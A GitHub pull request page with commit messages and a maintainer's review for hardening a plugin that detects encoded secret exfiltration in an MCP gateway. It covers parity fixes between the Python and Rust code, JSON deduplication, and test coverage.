Signed-off-by: Pratik Gandhi <gandhipratik203@gmail.com>
Signed-off-by: Pratik Gandhi <gandhipratik203@gmail.com>
- Collapse nested if statements in Rust to satisfy clippy collapsible_if
- Add pylint disable for model_post_init arguments-differ

Signed-off-by: Pratik Gandhi <gandhipratik203@gmail.com>
…is enabled

When a string is valid JSON, scan only the parsed structure — do not
also scan the raw text. This prevents the same encoded value from being
counted twice (once in the raw string, once in the parsed JSON value),
which could incorrectly trip min_findings_to_block.

Add regression test verifying a single secret in a JSON string produces
exactly 1 finding, not 2.

Signed-off-by: Pratik Gandhi <gandhipratik203@gmail.com>
…s, README fixes

- Add JSON parse heuristic: only attempt json.loads if string starts with
  { or [ and is within max_scan_string_length (Python + Rust)
- Add Rust-path test coverage for per-encoding thresholds, JSON parsing,
  heuristic skip, and malformed JSON (8 new parametrized tests)
- Fix README: correct wheel name to mcpgateway-encoded-exfil-detection,
  remove implemented features from Known Limitations, add Performance section
- Include pattern index in allowlist validation error messages
- Regenerate secrets baseline

Signed-off-by: Pratik Gandhi <gandhipratik203@gmail.com>
…ist partial match test

- Hoist core_chars.replace('=', "") to a single let above both boundary
  checks in has_valid_boundaries() to avoid redundant string allocation
- Add test verifying allowlist partial match suppresses detection

Signed-off-by: Pratik Gandhi <gandhipratik203@gmail.com>
…type mutation

- Scan dict keys as strings when len >= min_encoded_length to detect
  secrets used as JSON object keys (both Python and Rust)
- Prevent JSON-within-strings from mutating return type: scan raw text
  first (preserves original string), then parse JSON for additional
  findings with deduplication by match preview
- Add tests for key scanning and type preservation
- Update JSON test assertions to verify string return type

Signed-off-by: Pratik Gandhi <gandhipratik203@gmail.com>
…ve matching

- Fix parity bug: extra_sensitive_keywords and extra_egress_hints were
  not lowercased in Python, causing case-insensitive matching to fail
  when users configured mixed-case keywords. Rust already lowercases
  both (kw.to_lowercase() / h.to_lowercase()).
- Update module docstring to list all 3 hooks (was missing resource_post_fetch).
- Add pragma: no cover to Rust-only code paths (import, scan, engine init).
- Add regression tests for mixed-case extra keywords and egress hints.
- Add test for max_recursion_depth container depth guard.
- Add test for JSON dedup path (Unicode-escaped base64 only found via JSON parse).
- Achieve 100% differential test coverage on Python plugin.
- Update .secrets.baseline for new test file entries (false positives).

Signed-off-by: Mihai Criveti <crivetimihai@gmail.com>
@crivetimihai crivetimihai dismissed stale reviews from dima-zakharov and lucarlig via 9cbbcad March 30, 2026 20:44
@crivetimihai crivetimihai force-pushed the feat/encoded-exfil-hardening branch from afab86f to 9cbbcad Compare March 30, 2026 20:44
@crivetimihai
Copy link
Copy Markdown
Member

Review — rebased, reviewed, and fixed

Rebased onto main, resolved the .secrets.baseline conflict, and reviewed all code thoroughly.

Bugs fixed (commit 9cbbcad)

  1. Parity bug: _extra_keywords_bytes not lowercased_contains_sensitive_keywords lowercases decoded content, but extra keywords from config were stored as-is. Mixed-case configs (e.g. "WatsonX_Cred") silently failed. Rust already lowercases correctly.

  2. Parity bug: _extra_hints_lower not lowercased — same issue for egress hints. Variable was named _extra_hints_lower but didn't actually lowercase. Rust lowercases correctly.

  3. Docstring listed 2 of 3 hooks — updated to include resource_post_fetch.

Test coverage → 100%

  • Added 4 tests: mixed-case keyword/hint regression, max_recursion_depth guard, JSON dedup path (Unicode-escaped base64).
  • Added # pragma: no cover to Rust-only code paths.
  • 100% differential coverage on encoded_exfil_detector.py (up from 92%).

Review notes (no issues)

  • Design is solid and consistent with sibling plugins (PII filter, secrets detection).
  • Scoring system well-designed with clear configurable thresholds.
  • Redaction uses correct reverse-order offset-preserving edits.
  • JSON-within-strings dedup prevents double-counting.
  • No security issues — finding metadata only shows 24-char encoded previews, capped at 10 findings.
  • Rust implementation is a faithful port with identical scoring logic.
  • All 90 tests pass, 2 xfail for documented limitations.

crivetimihai
crivetimihai previously approved these changes Mar 30, 2026
Copy link
Copy Markdown
Member

@crivetimihai crivetimihai left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

LGTM — rebased, fixed two parity bugs (case-insensitive matching for extra keywords/hints), achieved 100% differential test coverage. Ready to merge.

Signed-off-by: Mihai Criveti <crivetimihai@gmail.com>
@crivetimihai crivetimihai merged commit 1404dbf into main Mar 30, 2026
33 checks passed
@crivetimihai crivetimihai deleted the feat/encoded-exfil-hardening branch March 30, 2026 23:34
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

enhancement New feature or request MUST P1: Non-negotiable, critical requirements without which the product is non-functional or unsafe plugins release-fix Critical bugfix required for the release security Improves security wxo wxo integration

Projects

None yet

Development

Successfully merging this pull request may close these issues.

[TESTING][PLUGINS]: Test, harden and document encoded exfil detection plugin

4 participants